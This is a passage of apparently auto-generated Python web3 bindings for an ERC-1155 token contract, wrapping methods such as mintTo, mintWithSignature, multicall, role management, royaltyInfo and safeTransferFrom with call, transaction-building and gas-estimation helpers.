trusted_forwarders,
primary_sale_recipient,
royalty_recipient,
royalty_bps,
platform_fee_bps,
platform_fee_recipient,
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
royalty_recipient,
royalty_bps,
platform_fee_bps,
platform_fee_recipient,
).estimateGas(tx_params.as_dict())
class IsApprovedForAllMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the isApprovedForAll method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, account: str, operator: str):
"""Validate the inputs to the isApprovedForAll method."""
self.validator.assert_valid(
method_name="isApprovedForAll",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
self.validator.assert_valid(
method_name="isApprovedForAll",
parameter_name="operator",
argument_value=operator,
)
operator = self.validate_and_checksum_address(operator)
return (account, operator)
def call(
self, account: str, operator: str, tx_params: Optional[TxParams] = None
) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(account, operator) = self.validate_and_normalize_inputs(
account, operator
)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(account, operator).call(
tx_params.as_dict()
)
return bool(returned)
def send_transaction(
self, account: str, operator: str, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(account, operator) = self.validate_and_normalize_inputs(
account, operator
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, operator).transact(
tx_params.as_dict()
)
def build_transaction(
self, account: str, operator: str, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(account, operator) = self.validate_and_normalize_inputs(
account, operator
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, operator).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, account: str, operator: str, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(account, operator) = self.validate_and_normalize_inputs(
account, operator
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, operator).estimateGas(
tx_params.as_dict()
)
class IsTrustedForwarderMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the isTrustedForwarder method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, forwarder: str):
"""Validate the inputs to the isTrustedForwarder method."""
self.validator.assert_valid(
method_name="isTrustedForwarder",
parameter_name="forwarder",
argument_value=forwarder,
)
forwarder = self.validate_and_checksum_address(forwarder)
return forwarder
def call(
self, forwarder: str, tx_params: Optional[TxParams] = None
) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(forwarder) = self.validate_and_normalize_inputs(forwarder)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(forwarder).call(tx_params.as_dict())
return bool(returned)
def send_transaction(
self, forwarder: str, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(forwarder) = self.validate_and_normalize_inputs(forwarder)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(forwarder).transact(tx_params.as_dict())
def build_transaction(
self, forwarder: str, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(forwarder) = self.validate_and_normalize_inputs(forwarder)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(forwarder).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, forwarder: str, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(forwarder) = self.validate_and_normalize_inputs(forwarder)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(forwarder).estimateGas(
tx_params.as_dict()
)
class MintToMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the mintTo method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, to: str, token_id: int, uri: str, amount: int
):
"""Validate the inputs to the mintTo method."""
self.validator.assert_valid(
method_name="mintTo",
parameter_name="_to",
argument_value=to,
)
to = self.validate_and_checksum_address(to)
self.validator.assert_valid(
method_name="mintTo",
parameter_name="_tokenId",
argument_value=token_id,
)
# safeguard against fractional inputs
token_id = int(token_id)
self.validator.assert_valid(
method_name="mintTo",
parameter_name="_uri",
argument_value=uri,
)
self.validator.assert_valid(
method_name="mintTo",
parameter_name="_amount",
argument_value=amount,
)
# safeguard against fractional inputs
amount = int(amount)
return (to, token_id, uri, amount)
def call(
self,
to: str,
token_id: int,
uri: str,
amount: int,
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(to, token_id, uri, amount) = self.validate_and_normalize_inputs(
to, token_id, uri, amount
)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(to, token_id, uri, amount).call(
tx_params.as_dict()
)
def send_transaction(
self,
to: str,
token_id: int,
uri: str,
amount: int,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(to, token_id, uri, amount) = self.validate_and_normalize_inputs(
to, token_id, uri, amount
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(to, token_id, uri, amount).transact(
tx_params.as_dict()
)
def build_transaction(
self,
to: str,
token_id: int,
uri: str,
amount: int,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(to, token_id, uri, amount) = self.validate_and_normalize_inputs(
to, token_id, uri, amount
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
to, token_id, uri, amount
).buildTransaction(tx_params.as_dict())
def estimate_gas(
self,
to: str,
token_id: int,
uri: str,
amount: int,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(to, token_id, uri, amount) = self.validate_and_normalize_inputs(
to, token_id, uri, amount
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(to, token_id, uri, amount).estimateGas(
tx_params.as_dict()
)
class MintWithSignatureMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the mintWithSignature method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, req: ITokenERC1155MintRequest, signature: Union[bytes, str]
):
"""Validate the inputs to the mintWithSignature method."""
self.validator.assert_valid(
method_name="mintWithSignature",
parameter_name="_req",
argument_value=req,
)
self.validator.assert_valid(
method_name="mintWithSignature",
parameter_name="_signature",
argument_value=signature,
)
return (req, signature)
def call(
self,
req: ITokenERC1155MintRequest,
signature: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(req, signature) = self.validate_and_normalize_inputs(req, signature)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(req, signature).call(tx_params.as_dict())
def send_transaction(
self,
req: ITokenERC1155MintRequest,
signature: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(req, signature) = self.validate_and_normalize_inputs(req, signature)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(req, signature).transact(
tx_params.as_dict()
)
def build_transaction(
self,
req: ITokenERC1155MintRequest,
signature: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(req, signature) = self.validate_and_normalize_inputs(req, signature)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(req, signature).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
req: ITokenERC1155MintRequest,
signature: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(req, signature) = self.validate_and_normalize_inputs(req, signature)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(req, signature).estimateGas(
tx_params.as_dict()
)
class MulticallMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the multicall method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, data: List[Union[bytes, str]]):
"""Validate the inputs to the multicall method."""
self.validator.assert_valid(
method_name="multicall",
parameter_name="data",
argument_value=data,
)
return data
def call(
self,
data: List[Union[bytes, str]],
tx_params: Optional[TxParams] = None,
) -> List[Union[bytes, str]]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(data) = self.validate_and_normalize_inputs(data)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(data).call(tx_params.as_dict())
return [Union[bytes, str](element) for element in returned]
def send_transaction(
self,
data: List[Union[bytes, str]],
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(data) = self.validate_and_normalize_inputs(data)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(data).transact(tx_params.as_dict())
def build_transaction(
self,
data: List[Union[bytes, str]],
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(data) = self.validate_and_normalize_inputs(data)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(data).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
data: List[Union[bytes, str]],
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(data) = self.validate_and_normalize_inputs(data)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(data).estimateGas(tx_params.as_dict())
class NameMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the name method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return str(returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class NextTokenIdToMintMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the nextTokenIdToMint method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return int(returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class OwnerMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the owner method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return str(returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class PlatformFeeBpsMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the platformFeeBps method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return int(returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class PlatformFeeRecipientMethod(
ContractMethod
): # pylint: disable=invalid-name
"""Various interfaces to the platformFeeRecipient method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return str(returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class PrimarySaleRecipientMethod(
ContractMethod
): # pylint: disable=invalid-name
"""Various interfaces to the primarySaleRecipient method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return str(returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class RenounceRoleMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the renounceRole method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, role: Union[bytes, str], account: str
):
"""Validate the inputs to the renounceRole method."""
self.validator.assert_valid(
method_name="renounceRole",
parameter_name="role",
argument_value=role,
)
self.validator.assert_valid(
method_name="renounceRole",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
return (role, account)
def call(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(role, account).call(tx_params.as_dict())
def send_transaction(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).transact(
tx_params.as_dict()
)
def build_transaction(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).estimateGas(
tx_params.as_dict()
)
class RevokeRoleMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the revokeRole method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, role: Union[bytes, str], account: str
):
"""Validate the inputs to the revokeRole method."""
self.validator.assert_valid(
method_name="revokeRole",
parameter_name="role",
argument_value=role,
)
self.validator.assert_valid(
method_name="revokeRole",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
return (role, account)
def call(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(role, account).call(tx_params.as_dict())
def send_transaction(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).transact(
tx_params.as_dict()
)
def build_transaction(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).estimateGas(
tx_params.as_dict()
)
class RoyaltyInfoMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the royaltyInfo method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, token_id: int, sale_price: int):
"""Validate the inputs to the royaltyInfo method."""
self.validator.assert_valid(
method_name="royaltyInfo",
parameter_name="tokenId",
argument_value=token_id,
)
# safeguard against fractional inputs
token_id = int(token_id)
self.validator.assert_valid(
method_name="royaltyInfo",
parameter_name="salePrice",
argument_value=sale_price,
)
# safeguard against fractional inputs
sale_price = int(sale_price)
return (token_id, sale_price)
def call(
self,
token_id: int,
sale_price: int,
tx_params: Optional[TxParams] = None,
) -> Tuple[str, int]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(token_id, sale_price) = self.validate_and_normalize_inputs(
token_id, sale_price
)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(token_id, sale_price).call(
tx_params.as_dict()
)
return (
returned[0],
returned[1],
)
def send_transaction(
self,
token_id: int,
sale_price: int,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(token_id, sale_price) = self.validate_and_normalize_inputs(
token_id, sale_price
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(token_id, sale_price).transact(
tx_params.as_dict()
)
def build_transaction(
self,
token_id: int,
sale_price: int,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(token_id, sale_price) = self.validate_and_normalize_inputs(
token_id, sale_price
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(token_id, sale_price).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
token_id: int,
sale_price: int,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(token_id, sale_price) = self.validate_and_normalize_inputs(
token_id, sale_price
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(token_id, sale_price).estimateGas(
tx_params.as_dict()
)
class SafeBatchTransferFromMethod(
ContractMethod
): # pylint: disable=invalid-name
"""Various interfaces to the safeBatchTransferFrom method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self,
_from: str,
to: str,
ids: List[int],
amounts: List[int],
data: Union[bytes, str],
):
"""Validate the inputs to the safeBatchTransferFrom method."""
self.validator.assert_valid(
method_name="safeBatchTransferFrom",
parameter_name="from",
argument_value=_from,
)
_from = self.validate_and_checksum_address(_from)
self.validator.assert_valid(
method_name="safeBatchTransferFrom",
parameter_name="to",
argument_value=to,
)
to = self.validate_and_checksum_address(to)
self.validator.assert_valid(
method_name="safeBatchTransferFrom",
parameter_name="ids",
argument_value=ids,
)
self.validator.assert_valid(
method_name="safeBatchTransferFrom",
parameter_name="amounts",
argument_value=amounts,
)
self.validator.assert_valid(
method_name="safeBatchTransferFrom",
parameter_name="data",
argument_value=data,
)
return (_from, to, ids, amounts, data)
def call(
self,
_from: str,
to: str,
ids: List[int],
amounts: List[int],
data: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(_from, to, ids, amounts, data) = self.validate_and_normalize_inputs(
_from, to, ids, amounts, data
)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(_from, to, ids, amounts, data).call(
tx_params.as_dict()
)
def send_transaction(
self,
_from: str,
to: str,
ids: List[int],
amounts: List[int],
data: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(_from, to, ids, amounts, data) = self.validate_and_normalize_inputs(
_from, to, ids, amounts, data
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(_from, to, ids, amounts, data).transact(
tx_params.as_dict()
)
def build_transaction(
self,
_from: str,
to: str,
ids: List[int],
amounts: List[int],
data: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(_from, to, ids, amounts, data) = self.validate_and_normalize_inputs(
_from, to, ids, amounts, data
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
_from, to, ids, amounts, data
).buildTransaction(tx_params.as_dict())
def estimate_gas(
self,
_from: str,
to: str,
ids: List[int],
amounts: List[int],
data: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(_from, to, ids, amounts, data) = self.validate_and_normalize_inputs(
_from, to, ids, amounts, data
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
_from, to, ids, amounts, data
).estimateGas(tx_params.as_dict())
class SafeTransferFromMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the safeTransferFrom method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self,
_from: str,
to: str,
_id: int,
amount: int,
data: Union[bytes, str],
):
"""Validate the inputs to the safeTransferFrom method."""
self.validator.assert_valid(
method_name="safeTransferFrom",
parameter_name="from",
argument_value=_from,
)
_from = self.validate_and_checksum_address(_from)
self.validator.assert_valid(
method_name="safeTransferFrom",
parameter_name="to",
argument_value=to,
)
to = self.validate_and_checksum_address(to)
self.validator.assert_valid(
method_name="safeTransferFrom",
parameter_name="id",
argument_value=_id,
)
# safeguard against fractional inputs
_id = int(_id)
self.validator.assert_valid(
method_name="safeTransferFrom",
parameter_name="amount",
argument_value=amount,
)
# safeguard against fractional inputs
amount = int(amount)
self.validator.assert_valid(
method_name="safeTransferFrom",
parameter_name="data",
argument_value=data,
)
return (_from, to, _id, amount, data)
def call(
self,
_from: str,
to: str,
_id: int,
amount: int,
data: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(_from, to, _id, amount, data) = self.validate_and_normalize_inputs(
_from, to, _id, amount, data
)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(_from, to, _id, amount, data).call(
tx_params.as_dict()
)
def send_transaction(
self,
_from: str,
to: str,
_id: int,
amount: int,
data: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(_from, to, _id, amount, data) = self.validate_and_normalize_inputs(
_from, to, _id, amount, data
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(_from, to, _id, amount, data).transact(
tx_params.as_dict()
)
def build_transaction(
self,
_from: str,
to: str,
_id: int,
amount: int,
data: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(_from, to, _id, amount, data) = self.validate_and_normalize_inputs(
_from, to, _id, amount, data
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
_from, to, _id, amount, data
).buildTransaction(tx_params.as_dict())
def estimate_gas(
self,
_from: str,
to: str,
_id: int,
amount: int,
data: Union[bytes, str],
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(_from, to, _id, amount, data) = self.validate_and_normalize_inputs(
_from, to, _id, amount, data
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
_from, to, _id, amount, data
).estimateGas(tx_params.as_dict())
